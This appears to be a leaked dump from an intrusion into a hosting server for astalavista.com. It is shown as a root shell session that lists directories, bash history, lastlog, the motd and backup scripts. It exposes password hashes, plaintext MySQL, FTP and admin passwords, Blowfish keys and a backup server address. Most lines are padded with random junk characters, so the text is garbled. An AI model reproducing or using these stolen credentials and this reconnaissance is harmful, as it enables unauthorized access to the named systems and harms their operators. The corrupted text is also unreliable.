jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
6 r% U( y! F4 v" \com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::0 |0 J0 C4 a, D" H$ \ v+ ^5 O
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
, p9 |* y+ j, @! A: i+ W2 Z8 f" c7 A) t0 s; q- b0 A( M! r
sh-3.2# cat /etc/motd5 Q' |0 \, t+ X7 `9 a
#####################################################
0 |( |6 |% l- p' @' ^) k! B#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
1 x% L" f& {! a4 D5 y+ p# |__| [__ | |__| | |__| | | | [__ | |__| #3 l0 x$ A2 w! o" t$ l4 J
# | | ___] | | | |___ | | \/ | ___] | | | #
+ I, G% s! B F t5 C% d5 Q# #0 F2 I3 O/ J5 e' O9 ~ W( P
#####################################################
/ b5 r' M. f/ O: L. G4 h# #: W9 J# ^: r$ z0 o3 _" x& Q
# Admin Contact - 链接标记support@secureservertech.com #' ~ u, g/ |5 D* J
# #
. X8 u$ r3 a. X$ M, q# Available ShortCuts #4 N0 d. ]4 _' R S
# #
- T$ A7 ]8 W1 g9 K, X8 C# nst - list active connections #; z, j, ]8 o4 d( g2 Z/ |$ I% t
# ddos - shows how many times each ip is connected #7 w: K6 y0 y+ D, m( ]& j
# ltr - restart the webserver #
$ n/ H: x3 I6 t, Q! H; ^# phpc - edit the php config file #
: N* A% f5 T0 r- J+ N# htc - edit the webserver configuration file #
+ U8 x/ H0 ~+ Q" ?- h s# up - uptime #. Z. k& ]: f- s# ]
# etd - edit the motd of the day file #+ g# j/ O% W5 a8 P+ s$ H3 `
# htr - start and restart apache if needed #- }# d- K, @8 y h
# syng - shows active SYN_RECV connections #& Z; F4 ]1 ?5 |/ _
# synd - syn flood blocker - “synd -h” for usage ## M- R& Q) l" i0 s
#####################################################
. k5 y5 v5 E, z' ?* g5 o1 F# NOTES: #
! V1 I" _0 A; P {1 {) \# Last Upgrade - 12-08-2008 by JF #: B/ U+ |; T6 X- j( Q& [! t3 s
# My.cnf/Mysql Optimization - 1-28-09 #$ T8 E( P- l; k; D' e
# #! j# }! y- r0 J0 p, t! t& b. ]
# #3 S/ z) }( O: _2 G
# #( f: A& O0 v/ Z
#####################################################
( S- T) Y5 J# D/ ]+ G t3 g, o: i
sh-3.2# lastlog | grep -v Never$ f. z! k; o9 o5 o
Username Port From Latest
: O z q/ @# Kroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
7 e3 \! h2 r' U) wadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
5 g5 Q3 z1 H& U' m0 Ucom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009- q3 Y o) w0 U) X) N
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009* E! `9 r7 L9 a' B* a: V
) J; E) k! l8 |8 I; ]
sh-3.2# ls -la8 N; t C9 u3 X w- A1 |8 g* x
total 453376/ R4 B$ {4 H: Q, S' h7 S
drwxr-x— 15 root root 4096 Jun 4 08:40 .
4 w4 m5 |9 l: z; tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .., J6 u* I/ h* x+ Y
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip: m' f7 C1 r+ @4 f. K& e1 t0 I
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
p- s7 U7 C8 N: z1 f" t-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
/ K* [ m4 g% y5 t: g5 P-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
5 @+ h3 I6 `( G, @1 L-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
$ V6 Q- C/ O9 |& E% Z-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
0 F% j( \ Y. R1 R; a6 v) \! N-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
3 }' K. q. \# q/ B, m-rw-r–r– 1 root root 1327 Nov 29 2007 cert$ B, l* v7 n* q1 c/ T6 z
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql' }; f* C/ ?' B
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan5 R* a) ~2 _4 y9 M$ @# y
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
4 v% W: v; b! X, }( F; A# n-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
0 ^" B9 s" C2 }5 u4 ^1 L: X6 odrwx—— 2 root root 4096 Oct 28 2007 .elinks
, c' A( E8 l$ F/ {6 mdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
- g6 V! S- g- {-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
; }. j" M( m. A-rw——- 1 root root 0 Apr 16 13:19 .history
' w* P& U7 \! |" t6 Q# H-rw-r–r– 1 root root 16095 Sep 11 2007 install.log/ h: h$ L Z0 [; ?
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
$ b. @+ ~/ {* f8 \9 l: V1 v- `( y-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh# I0 R- \! [6 P$ u7 F" B" D
-rw——- 1 root root 35 Jun 2 14:23 .lesshst" s; k0 c" L# o4 R1 P
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
5 l% ~' C5 w1 ydrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec# g9 h- U; A) X5 }, W: O2 ]7 _
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz5 g; J- S% a9 t( @" W
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
3 ?" n9 A1 u' a9 u( S-rwx—— 1 root root 760 Sep 18 2008 lp+ W: u/ G3 g8 s6 v' O
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
( B. Z& d/ y2 Q9 n& t-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
7 `* a$ y- V+ v' n& `0 \- _$ ]- }-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
: B8 W; A! S7 O' s% |# j$ [' P% {drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
" m9 W7 C3 H9 W' s+ P-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz$ L# y; y+ O% I m, u. T) A
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.32 J$ u1 d0 H, X! ^7 F" o
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz* ~2 S+ g, @) r5 Z7 q, i+ K
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
* y3 N9 |. r" e" s1 b. o-rw——- 1 root root 41 Oct 19 2007 .my.cnf+ I8 }! c# f2 {. Z
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
9 X/ H$ d |$ m2 S. h/ v) f-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport& Y% R/ X _4 v" ^3 d
-rw——- 1 root root 41 May 20 2008 .mytop; Y( ]4 }+ f+ N3 c5 m* ^6 K8 v
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6! n! E' X; y, x8 q7 l$ F
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
k! c; t0 i) f5 ?! x3 ~6 b* adrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
7 X. P" W" i4 C6 |-rw——- 1 root root 1462 Sep 21 2007 opt.php
# @0 p' E% i& }- K-rw-r–r– 1 root root 3371 Sep 22 2007 p5 l) u" T, i& |& ?
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
% w( x; `: [ }7 Z% _/ P! R-rw——- 1 root root 1024 Feb 3 21:32 .rnd
# ? e% K, g! M" J5 o5 S1 d-rw-r–r– 1 root root 716 Nov 28 2007 server.csr8 P& q/ p8 ^+ r- q
-rw-r–r– 1 root root 887 Nov 28 2007 server.key1 _% U% Q" g/ _% U- O; U; _ F
drwx—— 2 root root 4096 Oct 10 2008 .ssh4 v; j: ]( J# K( U0 e
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat1 G- S* T& \4 R) }4 q
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc2 p0 ^1 L/ n3 ~: W# s
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
+ o3 g; F$ ~9 k; Z1 d9 p-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
! G: O6 F* N! V( xdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp2 a8 J- O- o5 e1 c1 g( R$ F; @4 U
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
: j i: k. G% Bdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
1 j% G0 G5 t+ {+ m, y7 |-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
! t9 n# O: Q# ^-rw——- 1 root root 12997 May 16 2008 .viminfo
. {# b+ l) v0 j) v' b6 Z. w5 g0 d0 v7 f4 w
sh-3.2# cat .bash_history2 L: J0 r3 m4 S5 d" `
[snip]
3 |' h" P- J8 a$ @# ^! Zwget cp4sst.com/sstlinux.tar.gz
4 C( G `' u2 J, ~tar zxvf sstlinux.tar.gz8 h; I, Z K( Z r& T0 y! H
cd linux-2.6.27.10, @* W" o5 `, V: T" v
sh install.sh
' Q) C$ s ]0 J9 {" wmake bzImage ; make modules ; make modules_install ; make install( x; R% ~: i& A8 o
make clean' K; F/ a( S. {4 ^
service mysqld restart' R$ e7 S+ K7 K
[snip]
7 s9 P! q- R% w$ {9 Vcd /usr/sbin/
7 a8 J* W% K0 ^( m7 [chmod 4777 traceroute
/ M7 o( e( B( D! I+ Pchmod 4777 ping ^& b5 \" Y1 {2 [. |+ R
traceroute -I 链接标记[url]www.astalavista.ch[/url]% \4 @# e# H' F1 U: Q
[snip]) [; ^/ [1 E0 q7 g( i8 w$ {) f9 f
vi /etc/csf/csf.conf
( A/ i0 E4 \' y% ?( r! |3 B; N$ Xtraceroute google.ch
! y& ]- c, l9 ]# `3 Y8 iservice csf restart# v3 R0 k- v9 i, z. I$ z* A4 p3 e, b
tracert google.ch4 C+ N7 \5 I& K& {+ B/ o
service csf restart
# _ ~/ p2 j- A- H/ v$ Z) Qtraceroute 链接标记[url]www.google.ch[/url]8 n& l6 x0 w# U
tracert 链接标记[url]www.google.ch[/url]) K+ H- _4 Z6 O# d
traceroute 链接标记[url]www.google.ch[/url]) u Z9 I8 | c
locate traceroute4 T3 k. p0 U8 s3 s
chown 4755 /bin/traceroute7 I4 a9 g" g8 s
chown 4777 /bin/traceroute5 I" }& S. {% H# c/ \% n
locate ping
7 _1 [* a- R6 Q% Tchown 4755 /bin/ping+ Q/ I% \; y4 M+ Z* K+ n8 V* W* D* W) u
chown 4777 /bin/ping$ c1 d% U- d/ u) X& W$ K: B
cd /bin/
' ^/ v2 T) O& h2 ]2 k3 q9 wls -ali | grep ping
( T! o8 `4 u7 B6 j$ ochown root ping
/ n* c j1 s7 h2 e2 t% Cchmod 4755 ping
. {$ M {. }) O( n/ a/ Qls -ali | grep traceroute& h' }# V$ `; X
chown root traceroute) S9 v2 Q: j6 s: _
chmod 4755 traceroute- G% z' T" M: s- H
ls -ali | grep traceroute W! }! [; J4 U' a0 Q; _
traceroute -I 链接标记[url]www.google.ch[/url]
/ q' \" @1 Q3 C8 q# ]traceroute 链接标记[url]www.google.ch[/url]1 D, I k/ z% {( O$ ^2 z" V
whois pmsantos.ch
: _( u+ ]& ^- J% Z* h9 g+ |5 n[snip]' N4 t' |- U; e4 G, b
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
! t! B9 R4 ~: p/ X, w# ^7 t4 Vmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
4 a! ?1 v9 n& B8 e# C% k( tmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
0 ]* z+ o. q% A/ Kmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql7 a4 B( v1 y9 ?4 D4 r! ]% s, G
top; n- c' |- f- x
ping ssth.ch' M' j1 t3 R7 Q+ }
ping asdlkfaljgasd???ljg???lasj.ch& j6 L. s. [: }5 F$ P
ping asdlkfaljgasdlasj.ch5 _/ `* g* f7 N' K# A. K' o0 b" D
ping 链接标记[url]www.ssth.ch[/url]+ X+ ^ B1 ^+ j5 k9 f
ping ssth.ch9 v6 p' @, G5 K2 z( G
nslookup 链接标记[url]www.google.ch[/url]& |% z# V/ Z* r7 L2 W9 s9 S
nslookup 链接标记[url]www.ssth.ch[/url]' T# }. \ N1 ^7 [$ O% w: p
man nslookup
1 J. z; n& ?9 _* aping 链接标记[url]www.google.ch[/url]0 y# j5 h5 m$ N* b/ z
nslookup 链接标记[url]www.google.ch[/url] v6 I0 ?7 {9 i+ V
nslookup 链接标记[url]www.google.ch[/url]% s( p/ @ D& a
nslookup salfjasdlf.ch. k6 L" D# L, p) E% V& M3 b3 q, p' F6 z
[snip]
- m; x! P) v( Z+ ?openssl passwd -1 sadf
\4 K1 u$ L! E; ~( `, Popenssl passwd -1 5cZNHstdTy$ C( ?# I x6 k0 n
mysql: s2 d# W0 @+ _1 w2 a. u ^
mysql
6 }6 p6 f* B' _5 |4 rlocate proftp
, M: ]7 ~0 k& [! ~9 k- |: gvi /etc/proftpd.passwd* E4 B k; n0 P
service proftpd restart
# |5 ^6 {: ~4 `$ k2 X4 \3 Jlocate proftpd.conf
$ g# _! L2 H- B0 J# Cvi /etc/proftpd.conf
2 T& w& G" c' M" x$ f ]vi /etc/proftpd.passwd; y3 {0 C; J k; b; J. f
service proftpd restart
: E& M& j4 q) J, h; n[snip]
8 K8 [9 b8 W, x& k1 x9 V/bin/sh /home/com/backup_system/backup.sh
1 ?7 \' u; M- T( t) [# y7 m% `tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
( j" L F5 p+ V! @mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
+ D2 y* D V0 s0 amysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql5 J5 c3 W5 ~0 a8 n9 B
ls -ali
, f- K+ d; L! I$ f4 X3 x9 Smysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
& r; b* F, |. Fmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql/ o5 t, x5 t# F- g# d+ y0 u+ P
crontab -l
! i8 W F8 F a6 k5 q& u, ccrontab -l
7 f& a/ E! E9 V& ?% i# S% F& T& i& Cphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
1 l& E8 ~6 D! m/home/com/public_html/modifications/cronjobs/exploits.sh
! b' F3 w7 P5 p- Q. Gwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
! _+ v. G7 C+ ]5 Otar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz0 m4 M X9 s2 Y0 }& ^0 w
cd lsws-4.0.3
$ O( o# K7 N& |0 r' @8 @sh install.sh/ s; w E, }& o; a2 L6 { X
uptime- R+ s; i1 s2 T" }- ~6 P; c
hdparm -tt /dev/sda# V# u4 Q+ s5 D0 v1 F t
iostat" Z9 @8 k! F( u+ G. O! `+ L) U
yum install iostat$ b7 R7 f0 D# J5 m' H- ^1 B& _9 z
iostat
$ P8 J& Y' K/ N7 nwhereis iostat! A; a& H1 s0 v1 H9 J
yjm clean all) N7 z, B$ y" \; ~
yum clean all ; yum -y update1 w/ ^% S7 f7 }! k# U" @
iostat# S ?% x' {; {0 u
yum install systat
. l y9 ~ v* brpm -qa | grep iostat
$ D( e- p4 j9 j% vrpm -qa | grep sysstat
# j, N. I6 s# I- ?3 Xrpm -qa | grep systat
2 B. l2 a: N/ @( f' Bdmesg -c
6 N0 ]4 y& X! a0 E6 ?5 ~sysctl -p, F- M4 g0 I, A% h. |4 _1 W/ t w
uname -r
' ?2 m9 J% r! f# scd /usr/src6 d9 y, D# [: f( m6 I9 F
wget nix101.com/kernels/sstlinux.tar.gz6 f: W! {$ T$ w( l) Y. O5 t+ e
shutdown -r now
2 ^" ^& |" v3 e# ]/ ]# Dnano -w /boot/grub/grub.conf
9 z o- t T: x+ h8 o4 y: Y, i/ W: C
sh-3.2# cat .my.cnf( J" j# ]9 f$ ^- r5 B+ L9 q
[client]9 c8 u1 ?" v. w
user=da_admin
, P, Q6 p* t1 Cpassword=X9dctmRH! x {! v! a6 f% z# W
5 Y5 V& t5 c7 e7 e5 }9 L
sh-3.2# cat /home/com/backup_system/backup.sh, Y& \4 X5 Y6 R5 V4 h
#!/bin/sh
^/ {: j6 b" T4 H#####################################################################
4 e, d2 P& S3 O: h# #
- G8 L) E) K8 f; M; r1 i# incremental backup for astalavista.com #
8 |: M$ w h- X" A/ C, `8 E/ t# #0 n) r/ m, h' e8 ^
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #. k1 m( V7 X* P9 W2 {$ Z
# #
+ b \. C+ t J9 Q1 i+ v0 k( g#####################################################################/ R) h+ z; Y5 k
[snip]( E( Y* Q" j0 ^( \
PROG_DIR=”/home/com/backup_system”;
2 E/ [* t8 ^% W$ J5 x- L# P" m- fBACKUP_DIR=”/home/com/backups”;0 B$ y9 a1 c* j# A$ Z) l1 H2 w5 k
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;& X" y+ M( _! d. s
# ftp for synology backup server5 s, t% p( {' S$ ^( A# Q: e
FTP_HOST=”212.254.194.163″;
* d3 g/ L' a; C% M; AFTP_PORT=”21″; p5 a" v. w; D! O' ?9 j8 J5 w a
FTP_USER=”astalavista.com”;$ D* g9 @/ n4 |6 a, M/ [
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;' T. Z: u* L' z( W) q# {& _+ q
FTP_DIR=”/astalavista.com”;
3 d7 z6 ~% m4 f0 @# database# b3 w2 X& Y2 @( }3 q3 r1 Y
DB_HOST=”localhost”;
) O$ [+ r/ g# L: S& l6 d0 _4 qDB_USER=”contrexxuser2″;" m- G0 I: ?9 D. B: f
DB_PASS=”0fEYNZgXz1pKe”;
$ i& a9 k. A5 r2 C8 iDB_DATABASE1=”com_contrexx2_live”;
0 M6 z0 a q) I7 Q& I1 i7 ?- @DB_DATABASE2=”com_contrexx2″;
8 h/ m* \' m$ J' J. t6 w/ b[snip]0 J5 c, U! ~2 z
ftp -in $FTP_HOST $FTP_PORT <<EOF
) N- f+ ]0 ]% T2 B, j5 Tquote USER $FTP_USER
0 C9 ~6 V6 y e9 Cquote PASS $FTP_PASS
4 d3 v2 s9 T, d, Wcd $FTP_DIR
) m% A, z7 N5 s/ c1 Q gput $DB_FULLNAME-SQL_Dump.tar) _+ O+ {- X0 ^! b1 Q
put $BACKUP_FULLNAME-Public_HTML.tar
, I3 `: Z A% c0 D4 U) U" bclose
F1 \8 H# C- K$ u( P3 j3 Ibye
+ [# |9 q) B# o, i* [/ ?# c, W% vEOF
! z/ ~9 n- E, x0 M) t0 w. o$ c; ^$ H' r- D3 k v4 a6 _
sh-3.2# cd /home
8 \/ c& \$ A- Z/ t. K/ Esh-3.2# ls -la
- n, ]1 S o6 d7 B6 rtotal 120
) ]) j5 Z1 Q3 p2 hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
( q- a/ S* t$ z( c& L3 Odrwxr-xr-x 25 root root 4096 Jun 3 02:43 .." U$ ~+ p4 T$ @4 N
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
+ L i) w9 r: f* }- C* x8 p1 e9 A7 ~6 G) p-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
: W) I, `, E5 k5 h2 C9 j, S9 e-rw——- 1 root root 8192 Jun 3 02:45 aquota.user1 u7 z( v. m8 X
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
9 j( G8 v5 P1 ^9 a/ k( N/ ydrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
; b8 P ?" N) E; }drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
2 K) v+ ?" @1 E0 a9 x: R( qdrwx–x–x 10 com com 4096 Apr 28 12:40 com3 P" C0 a8 b, q8 ^& q
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
$ |7 y' ?' q% z. I7 z: L" ldrwx—— 3 jon jon 4096 Sep 21 2007 jon/ Q3 t& e# _% p0 r1 q
drwx—— 2 root root 16384 Sep 11 2007 lost+found
. f3 n* A/ C$ f% I& n: sdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
9 x9 M9 D- ^& `drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata8 K& o' G( U! I" j& E
drwx—— 2 jon jon 4096 Sep 15 2007 test0 K9 ]$ L7 E) G' z
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
! `8 Y0 N0 C% Y7 e: c. m
3 g( @8 u# F, }3 e* b7 r$ @3 Ssh-3.2# cd admin
8 Z. G2 w* `8 K; e! U' ush-3.2# ls -la( T# q5 E @! z! H' ]0 a
total 1735896) |. a3 F8 [: U2 D3 f0 W7 L
drwx–x–x 9 admin admin 4096 Nov 28 2007 . g4 o- _* |9 B1 m" @
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 D5 X' D: p+ ^ |9 D1 T* D! M/ T# D
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
$ B7 H7 ?: L( F) Z0 }drwx—— 2 admin admin 4096 Sep 28 2007 backups) P' L" o; p9 ]( X' ^ s0 @
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
$ m' d8 `* q' o- Y-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout$ n% P; C; G5 s! V% t' H
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
8 F1 G; i# q; _1 i-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
5 k5 q2 z. B( l6 }drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups6 \% |; P( y/ J
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
; @; e% t5 ~! i$ N- i3 |drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
- N' P4 Y+ g. v-rw-r–r– 1 root root 24 Sep 21 2007 info.php
( j1 d, k2 ` y; _! z7 Y! y5 ddrwx—— 2 admin admin 4096 Sep 21 2007 mail( a; m6 u4 b4 r( N4 W! M' C
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
" ^. [2 n$ \: e2 C-rw-r–r– 1 root root 887 Nov 28 2007 server.key5 a; e' B( w6 z4 t! S. A
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
H" k3 T! o; \' \4 B0 m-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz% j5 x1 c6 r6 O8 I2 w$ j" n
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups7 [ s; G$ }2 k& K5 i# A; C
% I. T9 e! v( p0 p! m6 Q7 B
sh-3.2# ..3 O {6 a' D3 w3 N# K
sh-3.2# cd jon
% [' [, D; a7 x/ \6 j/ c s5 ash-3.2# ls -la
7 b3 p7 h' {0 H) `1 Ftotal 36
]* ] r' M2 O. B, ]/ W& f1 c3 ~drwx—— 3 jon jon 4096 Sep 21 2007 .( C# R8 V; A( U& M \
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ C) p3 J( o& X-rw——- 1 jon jon 53 Sep 21 2007 .bash_history$ c4 p7 V H! H. v% i6 }, N
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout& r% D- H& A7 z% n, F
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
$ P$ G$ Z- E, Z0 `-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
* Y0 S6 |5 |0 F# \-rw-r–r– 1 root root 24 Sep 21 2007 info.php) T7 O, t a. @5 f3 y/ _
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
6 @, Q! A5 k& g6 o8 ?7 n3 P- }& _& z2 z. U0 R4 w' O( _
sh-3.2# cd ..5 v% ?" `! @6 z8 y* F: U. W$ G2 O7 i
sh-3.2# cd test
) u5 h/ A3 U; ssh-3.2# ls -la
) B4 \6 F" t: e, n! A- h7 Ototal 48
: _7 b4 B J- _+ y& @drwx—— 2 jon jon 4096 Sep 15 2007 .0 W3 z$ t! p. c$ X$ V
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
" w6 r: w7 t& Q9 O2 \# `-rw——- 1 jon jon 79 Sep 21 2007 .bash_history5 B" s6 ~+ ]. O& {# e
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
% n( N% P% o0 @% P1 V-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile3 Z+ L7 r, X" d+ F
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
; t6 E$ }5 q% A1 A7 m8 Bsh-3.2# cat .bash_history1 R& d0 F' [6 u0 W) p! S
/usr/bin/mysqladmin -u root password PoliuJhytg67
+ M' P: v5 ]' i4 {: i* l! A+ L8 f2 K7 o& [+ z
sh-3.2# cd ..
5 S. ?7 W& s$ \# B6 S0 Ksh-3.2# cd astanet
3 z' c+ u( a1 b1 E" c$ e+ B" xsh-3.2# ls -la
4 u. x3 P6 H; A5 l" Wtotal 52
- H; t+ k) O5 N. j$ R& Bdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
6 `6 [% E2 U9 x" G: ?2 ]$ Wdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
/ @6 [- Z$ [, c% }1 s; idrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth9 q1 Z" T0 V5 a! z8 c) P5 `
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
; B+ p/ J y5 Y& Z' i( a-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout1 y E) ?2 t; i0 \( A& p3 ]8 T+ U1 g
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
4 d4 L1 i8 b; ^( K" ~$ C6 `3 T0 k-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc ? w8 E* e8 s2 P/ o
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
) Q) a- [0 F% r2 Qdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
" j N% F" B* Z4 U1 `drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
/ N. m" R% h) D$ ~! H-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history% b1 F* @2 H$ V! e8 ?6 Q4 ]
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
2 M# |% ?) W z' |& H-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow* t8 {4 l6 [" u% U
: ?$ B& {4 E6 k2 G' V0 z
sh-3.2# cd auth/
* V" J0 I/ }" J+ n& Rsh-3.2# ls -la# c7 d( y t5 e/ C, |! u3 h: ?( m2 n
total 28
: ^. Y7 y/ f" Adrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
! V# ^+ c: ~! W4 M/ t4 k( cdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..* l9 C! X) V3 H0 T4 [. L" z1 a
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
0 ~( J; C8 m7 U9 S; X-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php% U/ M2 A: d- o4 F
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd7 Q8 e( o% h4 ?; u3 o" g7 S; R0 f
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting/ ~0 U4 Q; N* ~, _! Q+ c
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd" Z5 {7 ?; X+ T E& H5 _
: a( K- n& X; p( k
sh-3.2# cat hackercontest.config.inc.php
& ~; _ X1 ?! U/ ~* S<?PHP) {' C+ t0 u5 H9 z% D
// Variabeln f?r Verbindung zur Datenbank //" j0 f3 v0 b7 ]+ T
$conxHost = ‘localhost’; // MySQL hostname
1 A$ U( g) g4 ?: E, z$conxUser = ‘hackercontest’; // MySQL user7 f' C" `# Q" E& ^
$conxPassword = ‘K6m@7dUc’; // MySQL password( K6 q! }! f: ^. ~: ^
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish: ^3 q2 P2 _4 ?+ `7 f+ A
?>1 C: @" U/ p: W$ W3 J6 _
sh-3.2# cat hosting.config.inc.php
: i$ @4 g; Z( I( \<?PHP
$ I5 }8 D( `1 K# Q// Variabeln f?r Verbindung zur Datenbank //
, a" T) `0 D% H1 h5 Q0 |* d$conxHost = ‘localhost’; // MySQL hostname2 W( R. A/ L! {
$conxUser = ‘hostinguser’; // MySQL user
' B* b4 {2 q/ q0 ^! O) V7 E6 ~$conxPassword = ‘cXvB3981′; // MySQL password4 ]1 F; g5 Y: m0 d7 A$ W
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
( U. K( B0 e% _ R! c( w1 u?>
